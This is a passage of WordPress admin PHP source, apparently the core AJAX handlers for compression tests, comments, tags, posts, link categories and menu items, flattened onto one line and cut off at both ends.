nonummy condimentum fringilla tempor pretium platea vel nibh netus Maecenas. Hac molestie amet justo quis pellentesque est ultrices interdum nibh Morbi. Cras mattis pretium Phasellus ante ipsum ipsum ut sociis Suspendisse Lorem. Ante et non molestie. Porta urna Vestibulum egestas id congue nibh eu risus gravida sit. Ac augue auctor Ut et non a elit massa id sodales. Elit eu Nulla at nibh adipiscing mattis lacus mauris at tempus. Netus nibh quis suscipit nec feugiat eget sed lorem et urna. Pellentesque lacus at ut massa consectetuer ligula ut auctor semper Pellentesque. Ut metus massa nibh quam Curabitur molestie nec mauris congue. Volutpat molestie elit justo facilisis neque ac risus Ut nascetur tristique. Vitae sit lorem tellus et quis Phasellus lacus tincidunt nunc Fusce. Pharetra wisi Suspendisse mus sagittis libero lacinia Integer consequat ac Phasellus. Et urna ac cursus tortor aliquam Aliquam amet tellus volutpat Vestibulum. Justo interdum condimentum In augue congue tellus sollicitudin Quisque quis nibh."'; if ( '1' === $_GET['test'] ) { echo $test_str; wp_die(); } elseif ( '2' === $_GET['test'] ) { if ( ! isset( $_SERVER['HTTP_ACCEPT_ENCODING'] ) ) { wp_die( -1 ); } if ( false !== stripos( $_SERVER['HTTP_ACCEPT_ENCODING'], 'deflate' ) && function_exists( 'gzdeflate' ) && ! $force_gzip ) { header( 'Content-Encoding: deflate' ); $out = gzdeflate( $test_str, 1 ); } elseif ( false !== stripos( $_SERVER['HTTP_ACCEPT_ENCODING'], 'gzip' ) && function_exists( 'gzencode' ) ) { header( 'Content-Encoding: gzip' ); $out = gzencode( $test_str, 1 ); } else { wp_die( -1 ); } echo $out; wp_die(); } elseif ( 'no' === $_GET['test'] ) { check_ajax_referer( 'update_can_compress_scripts' ); // Use `update_option()` on single site to mark the option for autoloading. if ( is_multisite() ) { update_site_option( 'can_compress_scripts', 0 ); } else { update_option( 'can_compress_scripts', 0, true ); } } elseif ( 'yes' === $_GET['test'] ) { check_ajax_referer( 'update_can_compress_scripts' ); // Use `update_option()` on single site to mark the option for autoloading. if ( is_multisite() ) { update_site_option( 'can_compress_scripts', 1 ); } else { update_option( 'can_compress_scripts', 1, true ); } } } wp_die( 0 ); } /** * Handles image editor previews via AJAX. * * @since 3.1.0 */ function wp_ajax_imgedit_preview() { $post_id = (int) $_GET['postid']; if ( empty( $post_id ) || ! current_user_can( 'edit_post', $post_id ) ) { wp_die( -1 ); } check_ajax_referer( "image_editor-$post_id" ); require_once ABSPATH . 'wp-admin/includes/image-edit.php'; if ( ! stream_preview_image( $post_id ) ) { wp_die( -1 ); } wp_die(); } /** * Handles oEmbed caching via AJAX. * * @since 3.1.0 * * @global WP_Embed $wp_embed WordPress Embed object. */ function wp_ajax_oembed_cache() { $GLOBALS['wp_embed']->cache_oembed( $_GET['post'] ); wp_die( 0 ); } /** * Handles user autocomplete via AJAX. * * @since 3.4.0 */ function wp_ajax_autocomplete_user() { if ( ! is_multisite() || ! current_user_can( 'promote_users' ) || wp_is_large_network( 'users' ) ) { wp_die( -1 ); } /** This filter is documented in wp-admin/user-new.php */ if ( ! current_user_can( 'manage_network_users' ) && ! apply_filters( 'autocomplete_users_for_site_admins', false ) ) { wp_die( -1 ); } $return = array(); /* * Check the type of request. * Current allowed values are `add` and `search`. */ if ( isset( $_REQUEST['autocomplete_type'] ) && 'search' === $_REQUEST['autocomplete_type'] ) { $type = $_REQUEST['autocomplete_type']; } else { $type = 'add'; } /* * Check the desired field for value. * Current allowed values are `user_email` and `user_login`. */ if ( isset( $_REQUEST['autocomplete_field'] ) && 'user_email' === $_REQUEST['autocomplete_field'] ) { $field = $_REQUEST['autocomplete_field']; } else { $field = 'user_login'; } // Exclude current users of this blog. if ( isset( $_REQUEST['site_id'] ) ) { $id = absint( $_REQUEST['site_id'] ); } else { $id = get_current_blog_id(); } $include_blog_users = ( 'search' === $type ? get_users( array( 'blog_id' => $id, 'fields' => 'ID', ) ) : array() ); $exclude_blog_users = ( 'add' === $type ? get_users( array( 'blog_id' => $id, 'fields' => 'ID', ) ) : array() ); $users = get_users( array( 'blog_id' => false, 'search' => '*' . $_REQUEST['term'] . '*', 'include' => $include_blog_users, 'exclude' => $exclude_blog_users, 'search_columns' => array( 'user_login', 'user_nicename', 'user_email' ), ) ); foreach ( $users as $user ) { $return[] = array( /* translators: 1: User login, 2: User email address. */ 'label' => sprintf( _x( '%1$s (%2$s)', 'user autocomplete result' ), $user->user_login, $user->user_email ), 'value' => $user->$field, ); } wp_die( wp_json_encode( $return ) ); } /** * Handles Ajax requests for community events * * @since 4.8.0 */ function wp_ajax_get_community_events() { require_once ABSPATH . 'wp-admin/includes/class-wp-community-events.php'; check_ajax_referer( 'community_events' ); $search = isset( $_POST['location'] ) ? wp_unslash( $_POST['location'] ) : ''; $timezone = isset( $_POST['timezone'] ) ? wp_unslash( $_POST['timezone'] ) : ''; $user_id = get_current_user_id(); $saved_location = get_user_option( 'community-events-location', $user_id ); $events_client = new WP_Community_Events( $user_id, $saved_location ); $events = $events_client->get_events( $search, $timezone ); $ip_changed = false; if ( is_wp_error( $events ) ) { wp_send_json_error( array( 'error' => $events->get_error_message(), ) ); } else { if ( empty( $saved_location['ip'] ) && ! empty( $events['location']['ip'] ) ) { $ip_changed = true; } elseif ( isset( $saved_location['ip'] ) && ! empty( $events['location']['ip'] ) && $saved_location['ip'] !== $events['location']['ip'] ) { $ip_changed = true; } /* * The location should only be updated when it changes. The API doesn't always return * a full location; sometimes it's missing the description or country. The location * that was saved during the initial request is known to be good and complete, though. * It should be left intact until the user explicitly changes it (either by manually * searching for a new location, or by changing their IP address). * * If the location was updated with an incomplete response from the API, then it could * break assumptions that the UI makes (e.g., that there will always be a description * that corresponds to a latitude/longitude location). * * The location is stored network-wide, so that the user doesn't have to set it on each site. */ if ( $ip_changed || $search ) { update_user_meta( $user_id, 'community-events-location', $events['location'] ); } wp_send_json_success( $events ); } } /** * Handles dashboard widgets via AJAX. * * @since 3.4.0 */ function wp_ajax_dashboard_widgets() { require_once ABSPATH . 'wp-admin/includes/dashboard.php'; $pagenow = $_GET['pagenow']; if ( 'dashboard-user' === $pagenow || 'dashboard-network' === $pagenow || 'dashboard' === $pagenow ) { set_current_screen( $pagenow ); } switch ( $_GET['widget'] ) { case 'dashboard_primary': wp_dashboard_primary(); break; } wp_die(); } /** * Handles Customizer preview logged-in status via AJAX. * * @since 3.4.0 */ function wp_ajax_logged_in() { wp_die( 1 ); } // // Ajax helpers. // /** * Sends back current comment total and new page links if they need to be updated. * * Contrary to normal success Ajax response ("1"), die with time() on success. * * @since 2.7.0 * @access private * * @param int $comment_id * @param int $delta */ function _wp_ajax_delete_comment_response( $comment_id, $delta = -1 ) { $total = isset( $_POST['_total'] ) ? (int) $_POST['_total'] : 0; $per_page = isset( $_POST['_per_page'] ) ? (int) $_POST['_per_page'] : 0; $page = isset( $_POST['_page'] ) ? (int) $_POST['_page'] : 0; $url = isset( $_POST['_url'] ) ? sanitize_url( $_POST['_url'] ) : ''; // JS didn't send us everything we need to know. Just die with success message. if ( ! $total || ! $per_page || ! $page || ! $url ) { $time = time(); $comment = get_comment( $comment_id ); $comment_status = ''; $comment_link = ''; if ( $comment ) { $comment_status = $comment->comment_approved; } if ( 1 === (int) $comment_status ) { $comment_link = get_comment_link( $comment ); } $counts = wp_count_comments(); $x = new WP_Ajax_Response( array( 'what' => 'comment', // Here for completeness - not used. 'id' => $comment_id, 'supplemental' => array( 'status' => $comment_status, 'postId' => $comment ? $comment->comment_post_ID : '', 'time' => $time, 'in_moderation' => $counts->moderated, 'i18n_comments_text' => sprintf( /* translators: %s: Number of comments. */ _n( '%s Comment', '%s Comments', $counts->approved ), number_format_i18n( $counts->approved ) ), 'i18n_moderation_text' => sprintf( /* translators: %s: Number of comments. */ _n( '%s Comment in moderation', '%s Comments in moderation', $counts->moderated ), number_format_i18n( $counts->moderated ) ), 'comment_link' => $comment_link, ), ) ); $x->send(); } $total += $delta; if ( $total < 0 ) { $total = 0; } // Only do the expensive stuff on a page-break, and about 1 other time per page. if ( 0 === $total % $per_page || 1 === mt_rand( 1, $per_page ) ) { $post_id = 0; // What type of comment count are we looking for? $status = 'all'; $parsed = parse_url( $url ); if ( isset( $parsed['query'] ) ) { parse_str( $parsed['query'], $query_vars ); if ( ! empty( $query_vars['comment_status'] ) ) { $status = $query_vars['comment_status']; } if ( ! empty( $query_vars['p'] ) ) { $post_id = (int) $query_vars['p']; } if ( ! empty( $query_vars['comment_type'] ) ) { $type = $query_vars['comment_type']; } } if ( empty( $type ) ) { // Only use the comment count if not filtering by a comment_type. $comment_count = wp_count_comments( $post_id ); // We're looking for a known type of comment count. if ( isset( $comment_count->$status ) ) { $total = $comment_count->$status; } } // Else use the decremented value from above. } // The time since the last comment count. $time = time(); $comment = get_comment( $comment_id ); $counts = wp_count_comments(); $x = new WP_Ajax_Response( array( 'what' => 'comment', 'id' => $comment_id, 'supplemental' => array( 'status' => $comment ? $comment->comment_approved : '', 'postId' => $comment ? $comment->comment_post_ID : '', /* translators: %s: Number of comments. */ 'total_items_i18n' => sprintf( _n( '%s item', '%s items', $total ), number_format_i18n( $total ) ), 'total_pages' => (int) ceil( $total / $per_page ), 'total_pages_i18n' => number_format_i18n( (int) ceil( $total / $per_page ) ), 'total' => $total, 'time' => $time, 'in_moderation' => $counts->moderated, 'i18n_moderation_text' => sprintf( /* translators: %s: Number of comments. */ _n( '%s Comment in moderation', '%s Comments in moderation', $counts->moderated ), number_format_i18n( $counts->moderated ) ), ), ) ); $x->send(); } // // POST-based Ajax handlers. // /** * Handles adding a hierarchical term via AJAX. * * @since 3.1.0 * @access private */ function _wp_ajax_add_hierarchical_term() { $action = $_POST['action']; $taxonomy = get_taxonomy( substr( $action, 4 ) ); check_ajax_referer( $action, '_ajax_nonce-add-' . $taxonomy->name ); if ( ! current_user_can( $taxonomy->cap->edit_terms ) ) { wp_die( -1 ); } $names = explode( ',', $_POST[ 'new' . $taxonomy->name ] ); $parent = isset( $_POST[ 'new' . $taxonomy->name . '_parent' ] ) ? (int) $_POST[ 'new' . $taxonomy->name . '_parent' ] : 0; if ( 0 > $parent ) { $parent = 0; } if ( 'category' === $taxonomy->name ) { $post_category = isset( $_POST['post_category'] ) ? (array) $_POST['post_category'] : array(); } else { $post_category = ( isset( $_POST['tax_input'] ) && isset( $_POST['tax_input'][ $taxonomy->name ] ) ) ? (array) $_POST['tax_input'][ $taxonomy->name ] : array(); } $checked_categories = array_map( 'absint', (array) $post_category ); $popular_ids = wp_popular_terms_checklist( $taxonomy->name, 0, 10, false ); foreach ( $names as $cat_name ) { $cat_name = trim( $cat_name ); $category_nicename = sanitize_title( $cat_name ); if ( '' === $category_nicename ) { continue; } $cat_id = wp_insert_term( $cat_name, $taxonomy->name, array( 'parent' => $parent ) ); if ( ! $cat_id || is_wp_error( $cat_id ) ) { continue; } else { $cat_id = $cat_id['term_id']; } $checked_categories[] = $cat_id; if ( $parent ) { // Do these all at once in a second. continue; } ob_start(); wp_terms_checklist( 0, array( 'taxonomy' => $taxonomy->name, 'descendants_and_self' => $cat_id, 'selected_cats' => $checked_categories, 'popular_cats' => $popular_ids, ) ); $data = ob_get_clean(); $add = array( 'what' => $taxonomy->name, 'id' => $cat_id, 'data' => str_replace( array( "\n", "\t" ), '', $data ), 'position' => -1, ); } if ( $parent ) { // Foncy - replace the parent and all its children. $parent = get_term( $parent, $taxonomy->name ); $term_id = $parent->term_id; while ( $parent->parent ) { // Get the top parent. $parent = get_term( $parent->parent, $taxonomy->name ); if ( is_wp_error( $parent ) ) { break; } $term_id = $parent->term_id; } ob_start(); wp_terms_checklist( 0, array( 'taxonomy' => $taxonomy->name, 'descendants_and_self' => $term_id, 'selected_cats' => $checked_categories, 'popular_cats' => $popular_ids, ) ); $data = ob_get_clean(); $add = array( 'what' => $taxonomy->name, 'id' => $term_id, 'data' => str_replace( array( "\n", "\t" ), '', $data ), 'position' => -1, ); } $parent_dropdown_args = array( 'taxonomy' => $taxonomy->name, 'hide_empty' => 0, 'name' => 'new' . $taxonomy->name . '_parent', 'orderby' => 'name', 'hierarchical' => 1, 'show_option_none' => '— ' . $taxonomy->labels->parent_item . ' —', ); /** This filter is documented in wp-admin/includes/meta-boxes.php */ $parent_dropdown_args = apply_filters( 'post_edit_category_parent_dropdown_args', $parent_dropdown_args ); ob_start(); wp_dropdown_categories( $parent_dropdown_args ); $sup = ob_get_clean(); $add['supplemental'] = array( 'newcat_parent' => $sup ); $x = new WP_Ajax_Response( $add ); $x->send(); } /** * Handles deleting a comment via AJAX. * * @since 3.1.0 */ function wp_ajax_delete_comment() { $id = isset( $_POST['id'] ) ? (int) $_POST['id'] : 0; $comment = get_comment( $id ); if ( ! $comment ) { wp_die( time() ); } if ( ! current_user_can( 'edit_comment', $comment->comment_ID ) ) { wp_die( -1 ); } check_ajax_referer( "delete-comment_$id" ); $status = wp_get_comment_status( $comment ); $delta = -1; if ( isset( $_POST['trash'] ) && '1' === $_POST['trash'] ) { if ( 'trash' === $status ) { wp_die( time() ); } $r = wp_trash_comment( $comment ); } elseif ( isset( $_POST['untrash'] ) && '1' === $_POST['untrash'] ) { if ( 'trash' !== $status ) { wp_die( time() ); } $r = wp_untrash_comment( $comment ); // Undo trash, not in Trash. if ( ! isset( $_POST['comment_status'] ) || 'trash' !== $_POST['comment_status'] ) { $delta = 1; } } elseif ( isset( $_POST['spam'] ) && '1' === $_POST['spam'] ) { if ( 'spam' === $status ) { wp_die( time() ); } $r = wp_spam_comment( $comment ); } elseif ( isset( $_POST['unspam'] ) && '1' === $_POST['unspam'] ) { if ( 'spam' !== $status ) { wp_die( time() ); } $r = wp_unspam_comment( $comment ); // Undo spam, not in spam. if ( ! isset( $_POST['comment_status'] ) || 'spam' !== $_POST['comment_status'] ) { $delta = 1; } } elseif ( isset( $_POST['delete'] ) && '1' === $_POST['delete'] ) { $r = wp_delete_comment( $comment ); } else { wp_die( -1 ); } if ( $r ) { // Decide if we need to send back '1' or a more complicated response including page links and comment counts. _wp_ajax_delete_comment_response( $comment->comment_ID, $delta ); } wp_die( 0 ); } /** * Handles deleting a tag via AJAX. * * @since 3.1.0 */ function wp_ajax_delete_tag() { $tag_id = (int) $_POST['tag_ID']; check_ajax_referer( "delete-tag_$tag_id" ); if ( ! current_user_can( 'delete_term', $tag_id ) ) { wp_die( -1 ); } $taxonomy = ! empty( $_POST['taxonomy'] ) ? $_POST['taxonomy'] : 'post_tag'; $tag = get_term( $tag_id, $taxonomy ); if ( ! $tag || is_wp_error( $tag ) ) { wp_die( 1 ); } if ( wp_delete_term( $tag_id, $taxonomy ) ) { wp_die( 1 ); } else { wp_die( 0 ); } } /** * Handles deleting a link via AJAX. * * @since 3.1.0 */ function wp_ajax_delete_link() { $id = isset( $_POST['id'] ) ? (int) $_POST['id'] : 0; check_ajax_referer( "delete-bookmark_$id" ); if ( ! current_user_can( 'manage_links' ) ) { wp_die( -1 ); } $link = get_bookmark( $id ); if ( ! $link || is_wp_error( $link ) ) { wp_die( 1 ); } if ( wp_delete_link( $id ) ) { wp_die( 1 ); } else { wp_die( 0 ); } } /** * Handles deleting meta via AJAX. * * @since 3.1.0 */ function wp_ajax_delete_meta() { $id = isset( $_POST['id'] ) ? (int) $_POST['id'] : 0; check_ajax_referer( "delete-meta_$id" ); $meta = get_metadata_by_mid( 'post', $id ); if ( ! $meta ) { wp_die( 1 ); } if ( is_protected_meta( $meta->meta_key, 'post' ) || ! current_user_can( 'delete_post_meta', $meta->post_id, $meta->meta_key ) ) { wp_die( -1 ); } if ( delete_meta( $meta->meta_id ) ) { wp_die( 1 ); } wp_die( 0 ); } /** * Handles deleting a post via AJAX. * * @since 3.1.0 * * @param string $action Action to perform. */ function wp_ajax_delete_post( $action ) { if ( empty( $action ) ) { $action = 'delete-post'; } $id = isset( $_POST['id'] ) ? (int) $_POST['id'] : 0; check_ajax_referer( "{$action}_$id" ); if ( ! current_user_can( 'delete_post', $id ) ) { wp_die( -1 ); } if ( ! get_post( $id ) ) { wp_die( 1 ); } if ( wp_delete_post( $id ) ) { wp_die( 1 ); } else { wp_die( 0 ); } } /** * Handles sending a post to the Trash via AJAX. * * @since 3.1.0 * * @param string $action Action to perform. */ function wp_ajax_trash_post( $action ) { if ( empty( $action ) ) { $action = 'trash-post'; } $id = isset( $_POST['id'] ) ? (int) $_POST['id'] : 0; check_ajax_referer( "{$action}_$id" ); if ( ! current_user_can( 'delete_post', $id ) ) { wp_die( -1 ); } if ( ! get_post( $id ) ) { wp_die( 1 ); } if ( 'trash-post' === $action ) { $done = wp_trash_post( $id ); } else { $done = wp_untrash_post( $id ); } if ( $done ) { wp_die( 1 ); } wp_die( 0 ); } /** * Handles restoring a post from the Trash via AJAX. * * @since 3.1.0 * * @param string $action Action to perform. */ function wp_ajax_untrash_post( $action ) { if ( empty( $action ) ) { $action = 'untrash-post'; } wp_ajax_trash_post( $action ); } /** * Handles deleting a page via AJAX. * * @since 3.1.0 * * @param string $action Action to perform. */ function wp_ajax_delete_page( $action ) { if ( empty( $action ) ) { $action = 'delete-page'; } $id = isset( $_POST['id'] ) ? (int) $_POST['id'] : 0; check_ajax_referer( "{$action}_$id" ); if ( ! current_user_can( 'delete_page', $id ) ) { wp_die( -1 ); } if ( ! get_post( $id ) ) { wp_die( 1 ); } if ( wp_delete_post( $id ) ) { wp_die( 1 ); } else { wp_die( 0 ); } } /** * Handles dimming a comment via AJAX. * * @since 3.1.0 */ function wp_ajax_dim_comment() { $id = isset( $_POST['id'] ) ? (int) $_POST['id'] : 0; $comment = get_comment( $id ); if ( ! $comment ) { $x = new WP_Ajax_Response( array( 'what' => 'comment', 'id' => new WP_Error( 'invalid_comment', /* translators: %d: Comment ID. */ sprintf( __( 'Comment %d does not exist' ), $id ) ), ) ); $x->send(); } if ( ! current_user_can( 'edit_comment', $comment->comment_ID ) && ! current_user_can( 'moderate_comments' ) ) { wp_die( -1 ); } $current = wp_get_comment_status( $comment ); if ( isset( $_POST['new'] ) && $_POST['new'] === $current ) { wp_die( time() ); } check_ajax_referer( "approve-comment_$id" ); if ( in_array( $current, array( 'unapproved', 'spam' ), true ) ) { $result = wp_set_comment_status( $comment, 'approve', true ); } else { $result = wp_set_comment_status( $comment, 'hold', true ); } if ( is_wp_error( $result ) ) { $x = new WP_Ajax_Response( array( 'what' => 'comment', 'id' => $result, ) ); $x->send(); } // Decide if we need to send back '1' or a more complicated response including page links and comment counts. _wp_ajax_delete_comment_response( $comment->comment_ID ); wp_die( 0 ); } /** * Handles adding a link category via AJAX. * * @since 3.1.0 * * @param string $action Action to perform. */ function wp_ajax_add_link_category( $action ) { if ( empty( $action ) ) { $action = 'add-link-category'; } check_ajax_referer( $action ); $taxonomy_object = get_taxonomy( 'link_category' ); if ( ! current_user_can( $taxonomy_object->cap->manage_terms ) ) { wp_die( -1 ); } $names = explode( ',', wp_unslash( $_POST['newcat'] ) ); $x = new WP_Ajax_Response(); foreach ( $names as $cat_name ) { $cat_name = trim( $cat_name ); $slug = sanitize_title( $cat_name ); if ( '' === $slug ) { continue; } $cat_id = wp_insert_term( $cat_name, 'link_category' ); if ( ! $cat_id || is_wp_error( $cat_id ) ) { continue; } else { $cat_id = $cat_id['term_id']; } $cat_name = esc_html( $cat_name ); $x->add( array( 'what' => 'link-category', 'id' => $cat_id, 'data' => "", 'position' => -1, ) ); } $x->send(); } /** * Handles adding a tag via AJAX. * * @since 3.1.0 */ function wp_ajax_add_tag() { check_ajax_referer( 'add-tag', '_wpnonce_add-tag' ); $taxonomy = ! empty( $_POST['taxonomy'] ) ? $_POST['taxonomy'] : 'post_tag'; $taxonomy_object = get_taxonomy( $taxonomy ); if ( ! current_user_can( $taxonomy_object->cap->edit_terms ) ) { wp_die( -1 ); } $x = new WP_Ajax_Response(); $tag = wp_insert_term( $_POST['tag-name'], $taxonomy, $_POST ); if ( $tag && ! is_wp_error( $tag ) ) { $tag = get_term( $tag['term_id'], $taxonomy ); } if ( ! $tag || is_wp_error( $tag ) ) { $message = __( 'An error has occurred. Please reload the page and try again.' ); $error_code = 'error'; if ( is_wp_error( $tag ) && $tag->get_error_message() ) { $message = $tag->get_error_message(); } if ( is_wp_error( $tag ) && $tag->get_error_code() ) { $error_code = $tag->get_error_code(); } $x->add( array( 'what' => 'taxonomy', 'data' => new WP_Error( $error_code, $message ), ) ); $x->send(); } $wp_list_table = _get_list_table( 'WP_Terms_List_Table', array( 'screen' => $_POST['screen'] ) ); $level = 0; $noparents = ''; if ( is_taxonomy_hierarchical( $taxonomy ) ) { $level = count( get_ancestors( $tag->term_id, $taxonomy, 'taxonomy' ) ); ob_start(); $wp_list_table->single_row( $tag, $level ); $noparents = ob_get_clean(); } ob_start(); $wp_list_table->single_row( $tag ); $parents = ob_get_clean(); require ABSPATH . 'wp-admin/includes/edit-tag-messages.php'; $message = ''; if ( isset( $messages[ $taxonomy_object->name ][1] ) ) { $message = $messages[ $taxonomy_object->name ][1]; } elseif ( isset( $messages['_item'][1] ) ) { $message = $messages['_item'][1]; } $x->add( array( 'what' => 'taxonomy', 'data' => $message, 'supplemental' => array( 'parents' => $parents, 'noparents' => $noparents, 'notice' => $message, ), ) ); $x->add( array( 'what' => 'term', 'position' => $level, 'supplemental' => (array) $tag, ) ); $x->send(); } /** * Handles getting a tagcloud via AJAX. * * @since 3.1.0 */ function wp_ajax_get_tagcloud() { if ( ! isset( $_POST['tax'] ) ) { wp_die( 0 ); } $taxonomy = sanitize_key( $_POST['tax'] ); $taxonomy_object = get_taxonomy( $taxonomy ); if ( ! $taxonomy_object ) { wp_die( 0 ); } if ( ! current_user_can( $taxonomy_object->cap->assign_terms ) ) { wp_die( -1 ); } $tags = get_terms( array( 'taxonomy' => $taxonomy, 'number' => 45, 'orderby' => 'count', 'order' => 'DESC', ) ); if ( empty( $tags ) ) { wp_die( $taxonomy_object->labels->not_found ); } if ( is_wp_error( $tags ) ) { wp_die( $tags->get_error_message() ); } foreach ( $tags as $key => $tag ) { $tags[ $key ]->link = '#'; $tags[ $key ]->id = $tag->term_id; } // We need raw tag names here, so don't filter the output. $return = wp_generate_tag_cloud( $tags, array( 'filter' => 0, 'format' => 'list', ) ); if ( empty( $return ) ) { wp_die( 0 ); } echo $return; wp_die(); } /** * Handles getting comments via AJAX. * * @since 3.1.0 * * @global int $post_id * * @param string $action Action to perform. */ function wp_ajax_get_comments( $action ) { global $post_id; if ( empty( $action ) ) { $action = 'get-comments'; } check_ajax_referer( $action ); if ( empty( $post_id ) && ! empty( $_REQUEST['p'] ) ) { $id = absint( $_REQUEST['p'] ); if ( ! empty( $id ) ) { $post_id = $id; } } if ( empty( $post_id ) ) { wp_die( -1 ); } $wp_list_table = _get_list_table( 'WP_Post_Comments_List_Table', array( 'screen' => 'edit-comments' ) ); if ( ! current_user_can( 'edit_post', $post_id ) ) { wp_die( -1 ); } $wp_list_table->prepare_items(); if ( ! $wp_list_table->has_items() ) { wp_die( 1 ); } $x = new WP_Ajax_Response(); ob_start(); foreach ( $wp_list_table->items as $comment ) { if ( ! current_user_can( 'edit_comment', $comment->comment_ID ) && 0 === $comment->comment_approved ) { continue; } get_comment( $comment ); $wp_list_table->single_row( $comment ); } $comment_list_item = ob_get_clean(); $x->add( array( 'what' => 'comments', 'data' => $comment_list_item, ) ); $x->send(); } /** * Handles replying to a comment via AJAX. * * @since 3.1.0 * * @param string $action Action to perform. */ function wp_ajax_replyto_comment( $action ) { if ( empty( $action ) ) { $action = 'replyto-comment'; } check_ajax_referer( $action, '_ajax_nonce-replyto-comment' ); $comment_post_id = (int) $_POST['comment_post_ID']; $post = get_post( $comment_post_id ); if ( ! $post ) { wp_die( -1 ); } if ( ! current_user_can( 'edit_post', $comment_post_id ) ) { wp_die( -1 ); } if ( empty( $post->post_status ) ) { wp_die( 1 ); } elseif ( in_array( $post->post_status, array( 'draft', 'pending', 'trash' ), true ) ) { wp_die( __( 'You cannot reply to a comment on a draft post.' ) ); } $user = wp_get_current_user(); if ( $user->exists() ) { $comment_author = wp_slash( $user->display_name ); $comment_author_email = wp_slash( $user->user_email ); $comment_author_url = wp_slash( $user->user_url ); $user_id = $user->ID; if ( current_user_can( 'unfiltered_html' ) ) { if ( ! isset( $_POST['_wp_unfiltered_html_comment'] ) ) { $_POST['_wp_unfiltered_html_comment'] = ''; } if ( wp_create_nonce( 'unfiltered-html-comment' ) !== $_POST['_wp_unfiltered_html_comment'] ) { kses_remove_filters(); // Start with a clean slate. kses_init_filters(); // Set up the filters. remove_filter( 'pre_comment_content', 'wp_filter_post_kses' ); add_filter( 'pre_comment_content', 'wp_filter_kses' ); } } } else { wp_die( __( 'Sorry, you must be logged in to reply to a comment.' ) ); } $comment_content = trim( $_POST['content'] ); if ( '' === $comment_content ) { wp_die( __( 'Please type your comment text.' ) ); } $comment_type = isset( $_POST['comment_type'] ) ? trim( $_POST['comment_type'] ) : 'comment'; $comment_parent = 0; if ( isset( $_POST['comment_ID'] ) ) { $comment_parent = absint( $_POST['comment_ID'] ); } $comment_auto_approved = false; $commentdata = array( 'comment_post_ID' => $comment_post_id, ); $commentdata += compact( 'comment_author', 'comment_author_email', 'comment_author_url', 'comment_content', 'comment_type', 'comment_parent', 'user_id' ); // Automatically approve parent comment. if ( ! empty( $_POST['approve_parent'] ) ) { $parent = get_comment( $comment_parent ); if ( $parent && '0' === $parent->comment_approved && (int) $parent->comment_post_ID === $comment_post_id ) { if ( ! current_user_can( 'edit_comment', $parent->comment_ID ) ) { wp_die( -1 ); } if ( wp_set_comment_status( $parent, 'approve' ) ) { $comment_auto_approved = true; } } } $comment_id = wp_new_comment( $commentdata ); if ( is_wp_error( $comment_id ) ) { wp_die( $comment_id->get_error_message() ); } $comment = get_comment( $comment_id ); if ( ! $comment ) { wp_die( 1 ); } $position = ( isset( $_POST['position'] ) && (int) $_POST['position'] ) ? (int) $_POST['position'] : '-1'; ob_start(); if ( isset( $_REQUEST['mode'] ) && 'dashboard' === $_REQUEST['mode'] ) { require_once ABSPATH . 'wp-admin/includes/dashboard.php'; _wp_dashboard_recent_comments_row( $comment ); } else { if ( isset( $_REQUEST['mode'] ) && 'single' === $_REQUEST['mode'] ) { $wp_list_table = _get_list_table( 'WP_Post_Comments_List_Table', array( 'screen' => 'edit-comments' ) ); } else { $wp_list_table = _get_list_table( 'WP_Comments_List_Table', array( 'screen' => 'edit-comments' ) ); } $wp_list_table->single_row( $comment ); } $comment_list_item = ob_get_clean(); $response = array( 'what' => 'comment', 'id' => $comment->comment_ID, 'data' => $comment_list_item, 'position' => $position, ); $counts = wp_count_comments(); $response['supplemental'] = array( 'in_moderation' => $counts->moderated, 'i18n_comments_text' => sprintf( /* translators: %s: Number of comments. */ _n( '%s Comment', '%s Comments', $counts->approved ), number_format_i18n( $counts->approved ) ), 'i18n_moderation_text' => sprintf( /* translators: %s: Number of comments. */ _n( '%s Comment in moderation', '%s Comments in moderation', $counts->moderated ), number_format_i18n( $counts->moderated ) ), ); if ( $comment_auto_approved ) { $response['supplemental']['parent_approved'] = $parent->comment_ID; $response['supplemental']['parent_post_id'] = $parent->comment_post_ID; } $x = new WP_Ajax_Response(); $x->add( $response ); $x->send(); } /** * Handles editing a comment via AJAX. * * @since 3.1.0 */ function wp_ajax_edit_comment() { check_ajax_referer( 'replyto-comment', '_ajax_nonce-replyto-comment' ); $comment_id = (int) $_POST['comment_ID']; if ( ! current_user_can( 'edit_comment', $comment_id ) ) { wp_die( -1 ); } if ( '' === $_POST['content'] ) { wp_die( __( 'Please type your comment text.' ) ); } if ( isset( $_POST['status'] ) ) { $_POST['comment_status'] = $_POST['status']; } $updated = edit_comment(); if ( is_wp_error( $updated ) ) { wp_die( $updated->get_error_message() ); } $position = ( isset( $_POST['position'] ) && (int) $_POST['position'] ) ? (int) $_POST['position'] : '-1'; /* * Checkbox is used to differentiate between the Edit Comments screen (1) * and the Comments section on the Edit Post screen (0). */ $checkbox = ( isset( $_POST['checkbox'] ) && '1' === $_POST['checkbox'] ) ? 1 : 0; $wp_list_table = _get_list_table( $checkbox ? 'WP_Comments_List_Table' : 'WP_Post_Comments_List_Table', array( 'screen' => 'edit-comments' ) ); $comment = get_comment( $comment_id ); if ( empty( $comment->comment_ID ) ) { wp_die( -1 ); } ob_start(); $wp_list_table->single_row( $comment ); $comment_list_item = ob_get_clean(); $x = new WP_Ajax_Response(); $x->add( array( 'what' => 'edit_comment', 'id' => $comment->comment_ID, 'data' => $comment_list_item, 'position' => $position, ) ); $x->send(); } /** * Handles adding a menu item via AJAX. * * @since 3.1.0 */ function wp_ajax_add_menu_item() { check_ajax_referer( 'add-menu_item', 'menu-settings-column-nonce' ); if ( ! current_user_can( 'edit_theme_options' ) ) { wp_die( -1 ); } require_once ABSPATH . 'wp-admin/includes/nav-menu.php'; /* * For performance reasons, we omit some object properties from the checklist. * The following is a hacky way to restore them when adding non-custom items. */ $menu_items_data = array(); foreach ( (array) $_POST['menu-item'] as $menu_item_data ) { if ( ! empty( $menu_item_data['menu-item-type'] ) && 'custom' !== $menu_item_data['menu-item-type'] && ! empty( $menu_item_data['menu-item-object-id'] ) ) { switch ( $menu_item_data['menu-item-type'] ) { case 'post_type': $_object = get_post( $menu_item_data['menu-item-object-id'] ); break; case 'post_type_archive': $_object = get_post_type_object( $menu_item_data['menu-item-object'] ); break; case 'taxonomy': $_object = get_term( $menu_item_data['menu-item-object-id'], $menu_item_data['menu-item-object'] ); break; } $_menu_items = array_map( 'wp_setup_nav_menu_item', array( $_object ) ); $_menu_item = reset( $_menu_items ); // Restore the missing menu item properties. $menu_item_data['menu-item-description'] = $_menu_item->description; } $menu_items_data[] = $menu_item_data; } $item_ids = wp_save_nav_menu_items( 0, $menu_items_data ); if ( is_wp_error( $item_ids ) ) 